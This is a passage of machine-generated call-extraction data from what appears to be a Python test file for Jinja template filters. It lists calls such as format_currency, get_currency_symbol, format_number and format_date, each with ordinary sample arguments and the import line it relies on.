calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((912, 34, 912, 55), 'mock.Mock', 'Mock', (), '', False, 'from mock import Mock\n'), ((913, 17, 913, 138), 'app.jinja_filters.format_repeating_summary', 'format_repeating_summary', (), '', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((32, 25, 32, 60), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(32, 51, 32, 56): '"""100"""', (32, 58, 32, 59): '(2)'}, {}), "('100', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((33, 25, 33, 62), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(33, 51, 33, 58): '"""100.0"""', (33, 60, 33, 61): '(2)'}, {}), "('100.0', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((34, 25, 34, 63), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(34, 51, 34, 59): '"""100.00"""', (34, 61, 34, 62): '(2)'}, {}), "('100.00', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((35, 25, 35, 58), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(35, 51, 35, 57): '"""1000"""'}, {}), "('1000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((36, 25, 36, 59), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(36, 51, 36, 58): '"""10000"""'}, {}), "('10000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((37, 25, 37, 63), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(37, 51, 37, 62): '"""100000000"""'}, {}), "('100000000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((38, 25, 38, 66), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(38, 51, 38, 62): '"""100000000"""', (38, 64, 38, 65): '(2)'}, {}), "('100000000', 2)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((39, 25, 39, 56), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(39, 51, 39, 52): '(0)', (39, 54, 39, 55): '(2)'}, {}), '(0, 2)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((40, 25, 40, 53), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(40, 51, 40, 52): '(0)'}, {}), '(0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((41, 25, 41, 54), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(41, 51, 41, 53): '""""""'}, {}), "('')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((42, 25, 42, 56), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(42, 51, 42, 55): 'None'}, {}), '(None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((47, 25, 47, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(47, 45, 47, 50): '"""GBP"""'}, {}), "('GBP')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((48, 25, 48, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(48, 45, 48, 50): '"""EUR"""'}, {}), "('EUR')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((49, 25, 49, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(49, 45, 49, 50): '"""USD"""'}, {}), "('USD')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((50, 25, 50, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(50, 45, 50, 50): '"""JPY"""'}, {}), "('JPY')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((51, 25, 51, 48), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(51, 45, 51, 47): '""""""'}, {}), "('')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((55, 25, 55, 78), 'app.jinja_filters.format_currency', 'format_currency', ({(55, 41, 55, 64): 'self.autoescape_context', (55, 66, 55, 70): '"""11"""', (55, 72, 55, 77): '"""GBP"""'}, {}), "(self.autoescape_context, '11', 'GBP')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((56, 25, 56, 81), 'app.jinja_filters.format_currency', 'format_currency', ({(56, 41, 56, 64): 'self.autoescape_context', (56, 66, 56, 73): '"""11.99"""', (56, 75, 56, 80): '"""GBP"""'}, {}), "(self.autoescape_context, '11.99', 'GBP')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((57, 25, 57, 81), 'app.jinja_filters.format_currency', 'format_currency', ({(57, 41, 57, 64): 'self.autoescape_context', (57, 66, 57, 73): '"""11000"""', (57, 75, 57, 80): '"""USD"""'}, {}), "(self.autoescape_context, '11000', 'USD')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((58, 25, 58, 68), 'app.jinja_filters.format_currency', 'format_currency', ({(58, 41, 58, 64): 'self.autoescape_context', (58, 66, 58, 67): '(0)'}, {}), '(self.autoescape_context, 0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((59, 25, 59, 71), 'app.jinja_filters.format_currency', 'format_currency', ({(59, 41, 59, 64): 'self.autoescape_context', (59, 66, 59, 70): '(0.0)'}, {}), '(self.autoescape_context, 0.0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((60, 25, 60, 71), 'app.jinja_filters.format_currency', 'format_currency', ({(60, 41, 60, 64): 'self.autoescape_context', (60, 66, 60, 68): '""""""'}, {}), "(self.autoescape_context, '')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((61, 25, 61, 71), 'app.jinja_filters.format_currency', 'format_currency', ({(61, 41, 61, 64): 'self.autoescape_context', (61, 66, 61, 70): 'None'}, {}), '(self.autoescape_context, None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((66, 25, 66, 43), 'app.jinja_filters.format_number', 'format_number', ({(66, 39, 66, 42): '(123)'}, {}), '(123)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((67, 25, 67, 47), 'app.jinja_filters.format_number', 'format_number', ({(67, 39, 67, 46): '"""123.4"""'}, {}), "('123.4')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((68, 25, 68, 48), 'app.jinja_filters.format_number', 'format_number', ({(68, 39, 68, 47): '"""123.40"""'}, {}), "('123.40')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((69, 25, 69, 46), 'app.jinja_filters.format_number', 'format_number', ({(69, 39, 69, 45): '"""1000"""'}, {}), "('1000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((70, 25, 70, 47), 'app.jinja_filters.format_number', 'format_number', ({(70, 39, 70, 46): '"""10000"""'}, {}), "('10000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((71, 25, 71, 51), 'app.jinja_filters.format_number', 'format_number', ({(71, 39, 71, 50): '"""100000000"""'}, {}), "('100000000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((72, 25, 72, 41), 'app.jinja_filters.format_number', 'format_number', ({(72, 39, 72, 40): '(0)'}, {}), '(0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((73, 25, 73, 44), 'app.jinja_filters.format_number', 'format_number', ({(73, 39, 73, 43): '(0.0)'}, {}), '(0.0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((74, 25, 74, 42), 'app.jinja_filters.format_number', 'format_number', ({(74, 39, 74, 41): '""""""'}, {}), "('')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((75, 25, 75, 44), 'app.jinja_filters.format_number', 'format_number', ({(75, 39, 75, 43): 'None'}, {}), '(None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((142, 27, 142, 69), 'app.jinja_filters.format_date', 'format_date', ({(142, 39, 142, 62): 'self.autoescape_context', (142, 64, 142, 68): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((153, 27, 153, 69), 'app.jinja_filters.format_date', 'format_date', ({(153, 39, 153, 62): 'self.autoescape_context', (153, 64, 153, 68): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((160, 16, 160, 33), 'jinja2.Markup', 'Markup', ({(160, 23, 160, 32): '"""2017-01"""'}, {}), "('2017-01')", False, 'from jinja2 import Undefined, Markup\n'), ((164, 27, 164, 69), 'app.jinja_filters.format_date', 'format_date', ({(164, 39, 164, 62): 'self.autoescape_context', (164, 64, 164, 68): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((195, 27, 195, 78), 'app.jinja_filters.format_datetime', 'format_datetime', ({(195, 43, 195, 66): 'self.autoescape_context', (195, 68, 195, 77): 'date_time'}, {}), '(self.autoescape_context, date_time)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((206, 27, 206, 78), 'app.jinja_filters.format_datetime', 'format_datetime', ({(206, 43, 206, 66): 'self.autoescape_context', (206, 68, 206, 77): 'date_time'}, {}), '(self.autoescape_context, date_time)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((231, 12, 231, 72), 'app.jinja_filters.format_conditional_date', 'format_conditional_date', ({(231, 36, 231, 59): 'self.autoescape_context', (231, 61, 231, 65): 'None', (231, 67, 231, 71): 'None'}, {}), '(self.autoescape_context, None, None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((255, 13, 255, 68), 'unittest.mock.patch', 'patch', (), '', False, 'from unittest.mock import patch\n'), ((280, 12, 280, 58), 'app.jinja_filters.calculate_years_difference', 'calculate_years_difference', ({(280, 39, 280, 43): 'None', (280, 45, 280, 57): '"""2017-01-17"""'}, {}), "(None, '2017-01-17')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((292, 27, 292, 91), 'app.jinja_filters.format_date_range', 'format_date_range', ({(292, 45, 292, 68): 'self.autoescape_context', (292, 70, 292, 80): 'start_date', (292, 82, 292, 90): 'end_date'}, {}), '(self.autoescape_context, start_date, end_date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((303, 27, 303, 81), 'app.jinja_filters.format_date_range', 'format_date_range', ({(303, 45, 303, 68): 'self.autoescape_context', (303, 70, 303, 80): 'start_date'}, {}), '(self.autoescape_context, start_date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((400, 16, 400, 27), 'jinja2.Undefined', 'Undefined', ({}, 